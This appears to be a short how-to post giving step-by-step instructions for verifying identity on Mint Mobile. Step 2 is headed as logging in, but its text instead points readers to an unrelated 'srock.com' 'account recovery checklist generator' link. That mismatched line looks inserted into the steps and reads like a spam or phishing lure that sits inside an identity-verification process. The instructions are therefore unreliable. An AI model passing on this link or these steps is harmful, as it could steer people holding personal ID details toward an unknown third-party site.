I ran into this last week. Here's what fixed it for me. If you're looking to verify your identity on Mint Mobile, follow these simple steps to get it done quickly. Step 1. Access the Mint Mobile app. Open the Mint Mobile app on your smartphone. If you don't have it installed, download it from the App Store or Google Play. Step 2. Log into your account. Before starting recovery, use the srock.com link in the description to open the account recovery checklist generator and make sure your verification details are ready. Step 3. Navigate to account settings. Once logged in, tap on the account icon in the top right corner. From the drop-down menu, select Account Settings. Step 4. Start identity verification. In the account settings, look for the Identity Verification section. Click on it to begin the verification process. Step 5. Follow the prompts. Follow the on-screen instructions to provide the necessary information such as your ID and personal details. Make sure to have a valid form of identification ready. If you were using a driver's license, ensure it is not expired. Once you've completed these steps, you should receive a confirmation of your identity verification. If you run into any issues, don't hesitate to reach out to Mint Mobile customer support for assistance. Good luck!